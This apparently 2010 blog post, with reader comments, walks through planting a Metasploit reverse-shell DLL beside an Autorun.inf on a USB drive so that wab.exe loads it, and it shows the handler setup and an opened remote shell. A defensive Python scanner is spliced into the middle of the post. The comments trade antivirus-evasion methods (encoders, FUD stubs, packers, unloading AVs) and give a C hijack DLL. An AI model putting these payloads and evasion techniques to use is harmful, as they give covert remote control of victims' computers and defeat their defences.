I decided it might be useful to combine DLL hijacking with Autorun; here's the outcome.

# msfpayload windows/shell/reverse_tcp LHOST=192.168.0.58 D > /media/KINGSTON/wab32res.dll
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
Length: 290
Options: LHOST=192.168.0.58

root@pwn:~# touch /media/KINGSTON/test.vcf
root@pwn:~# ls -l /media/KINGSTON
total 32
-rwxr-xr-x 1 matt matt 91 2010-08-26 14:18 Autorun.inf
-rwxr-xr-x 1 matt matt 0 2010-08-26 14:28 test.vcf
-rwxr-xr-x 1 matt matt 14336 2010-08-26 14:28 wab32res.dll
root@pwn:~# cat /media/KINGSTON/Autorun.inf
[AutoRun]
OPEN="C:\Program Files\Outlook Express\wab.exe" test.vcf
ACTION=Run
LABEL=test

So, in the Autorun.inf file, we tell Windows to run wab.exe (Windows Address Book) and open the file "test.vcf". The wab32res.dll sitting next to it matters because wab.exe resolves that DLL through the normal DLL search order, which includes the directory it is launched from (here the root of the USB drive), so the planted copy is loaded in place of the legitimate one.
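A check a defender could run over a mounted removable drive (or a file share) to spot exactly this layout: a launch entry in Autorun.inf plus DLLs planted beside it. This is an added example in Python, not code from the post; the parser, the function names and the sample data are assumptions of the example, with the sample Autorun.inf and file names taken from the listing above.

```python
"""Added example: flag the Autorun.inf + planted DLL pattern shown in the post.

Defender-side check, not code from the original post. The parser, the
function names and the sample data below are all assumptions of this
example; the sample Autorun.inf is the one the post shows and the file
names are the ones from its directory listing.
"""
from pathlib import Path
import tempfile

# Constructed sample input: the Autorun.inf from the post.
SAMPLE_AUTORUN = r"""[AutoRun]
OPEN="C:\Program Files\Outlook Express\wab.exe" test.vcf
ACTION=Run
LABEL=test
"""
# Constructed: the other files that sat next to it on the USB stick.
SAMPLE_FILES = ["Autorun.inf", "test.vcf", "wab32res.dll"]


def parse_autorun(text):
    """Parse Autorun.inf (INI syntax, case-insensitive) into {section: {key: value}}."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):        # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")        # split on the first '=' only
        sections[current][key.strip().lower()] = value.strip()
    return sections


def launch_entries(sections):
    """Return (key, command) pairs for every [AutoRun] entry that runs a program.

    open= and shellexecute= run a program directly; shell\\<verb>\\command=
    entries define AutoPlay / context-menu verbs that can run one as well.
    """
    autorun = sections.get("autorun", {})
    hits = []
    for key, value in autorun.items():
        if key in ("open", "shellexecute") or (
            key.startswith("shell\\") and key.endswith("\\command")
        ):
            hits.append((key, value))
    return hits


def executable_from_command(command):
    """Return the program part of a command; a quoted path may contain spaces."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0] if command else ""


def assess_removable_media(autorun_text, filenames):
    """Report launch entries and any DLLs planted beside Autorun.inf."""
    findings = []
    entries = launch_entries(parse_autorun(autorun_text))
    for key, value in entries:
        findings.append(f"{key}= launches {executable_from_command(value)}")
    dlls = sorted(n for n in filenames if n.lower().endswith(".dll"))
    if entries and dlls:
        # The launched program's DLL search order includes the directory it
        # starts in, so a DLL next to Autorun.inf can be loaded in place of a
        # system one. This is the wab.exe / wab32res.dll case from the post.
        findings.append("DLLs beside Autorun.inf that the launched program may load: "
                        + ", ".join(dlls))
    return findings


def scan_directory(root):
    """Run the check against a real directory (e.g. a mounted USB drive)."""
    root = Path(root)
    inf = next((p for p in root.iterdir() if p.name.lower() == "autorun.inf"), None)
    if inf is None:
        return []
    names = [p.name for p in root.iterdir() if p.is_file() and p != inf]
    return assess_removable_media(inf.read_text(errors="replace"), names)


if __name__ == "__main__":
    # Recreate the post's USB drive layout in a temp dir and scan it.
    with tempfile.TemporaryDirectory() as tmp:
        for name in SAMPLE_FILES:
            (Path(tmp) / name).write_text(SAMPLE_AUTORUN if name == "Autorun.inf" else "")
        for finding in scan_directory(tmp):
            print(finding)
```

The check is deliberately simple: it does not judge the DLL's contents, only that a program is launched from the drive and that DLLs sit where that program's search order will find them. Combine it with an allow-list of expected file names or a hash check if you need fewer false positives on vendor-shipped media.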

# msfconsole
msf > use multi/handler
msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.58
LHOST => 192.168.0.58
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.0.58:4444
[*] Starting the payload handler…

Now when the USB card is inserted, the user will get the following dialog:

When the user clicks “OK”…

[*] Sending stage (240 bytes) to 192.168.0.252
[*] Command shell session 1 opened (192.168.0.58:4444 -> 192.168.0.252:1718) at Thu Aug 26 14:43:34 -0500 2010

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

F:\>dir
dir
Volume in drive F is KINGSTON
Volume Serial Number is 733A-3F95

Directory of F:\

08/26/2010 02:18 PM 91 Autorun.inf
08/26/2010 01:53 PM <DIR> .Trash-1000
08/26/2010 02:38 PM 14,336 wab32res.dll
08/26/2010 02:28 PM 0 test.v~b
08/26/2010 02:43 PM 176,212 test.vcf
4 File(s) 190,639 bytes
1 Dir(s) 4,002,332,672 bytes free

  1. Infolookup says:

    Good job Matt, you have just given me something else to think about now while trying to keep an eye on our Uni from all the many threats out there.

  2. Matt says:

    @Infolookup: Glad I can keep your life exciting. ;-)

  3. nico says:

    hey

    thanks for the article

    I've played a bit with those DLLs and it looks like AVs find them; even a
    msfpayload windows/exec CMD="c:\windows\system32\calc.exe" | msfencode -t dll -c 10 -o calc.dll gets me a Win32:Malware-gen alert on Avast, for example :s Any ideas how to overcome this?

  4. Matt says:

    @nico: There are a couple of different ways.

    1) You can write your own DLL, which is what I would suggest. Metasploit is just a tool to test vulnerabilities, but as far as being useful when it comes to exploiting vulnerabilities like this (when you have to include a payload of some sort), it's not very effective because it's picked up by quite a few AVs.

    2) There is a method for unloading AVs prior to executing your own code. I haven't played around with this yet, but I expect I will shortly.

    3) You can use a FUD to encode the DLL, which uses something called a "stub"; stubs are available that are specifically written to bypass detection. The problem with stubs, though, is that unless you pay the developer to create a specific stub for you personally, they don't stay undetected for very long.

    4) I haven't used this method yet, but after reading this document, I intend to try it. http://www.sans.org/reading_room/whitepapers/casestudies/effectiveness-antivirus-detecting-metasploit-payloads_2134

    Here’s a simplified example of rolling your own DLL:

    #include <windows.h>
    #include <stdlib.h>   /* exit() */
    #define DLLIMPORT __declspec (dllexport)

    int hijack(void);     /* prototype: hijack() is defined below its first use */

    /* Exported function: the entry the host calls into once the DLL is loaded. */
    DLLIMPORT void hook_startup() { hijack(); }

    int hijack(void) {
      WinExec("calc", 0);  /* proof-of-concept payload: start calc */
      exit(0);             /* end the host process once the payload has run */
      return 0;
    }

  5. nico says:

    Wow, thanks for the detailed answer! I'll have a look at this today :)

  6. nico says:

    Result: 4/43 (9.3%)

    better… and freaky :/

  7. Matt says:

    @nico: What method did you use? I actually played around with trying to encode the DLLs using msfencode and I noticed that..

    1) it definitely helped bypass a lot of the AVs.. especially the shikata_ga_nai encoder.. but.....
    2) it totally broke the DLL. I think I know why, but I would like to find some more information on the subject.

  8. nico says:

    Yeah, looks like msfencode is breaking it :s
    I just tried the demo of ASProtect with a reverse meterpreter.

    I’ve had a quick look at the SANS paper which is nice, I’ll try some of his tricks

  9. Matt says:

    @nico: I’d really like to understand WHY it’s breaking it, though.

  10. nico says:

    I think it’s a fairly new option in msfencode, maybe not working very well atm.

    I tried this: http://hype-free.blogspot.com/2009/01/loading-meterpreter-in-dll.html (combined with an msfencrypted shellcode) but the resulting DLL compiled with gcc does not work either >< and my Windows coding skills just suck… I'll go on digging this way, I guess.

  11. Matt says:

    @nico: Have you looked into MinGW yet? I haven't used it specifically for this yet, but I've used it in the past to compile Windows binaries. I want to say that BackTrack comes with it, too (I saw a BT video where it was being used). I don't use BT personally, so I cannot say for certain.
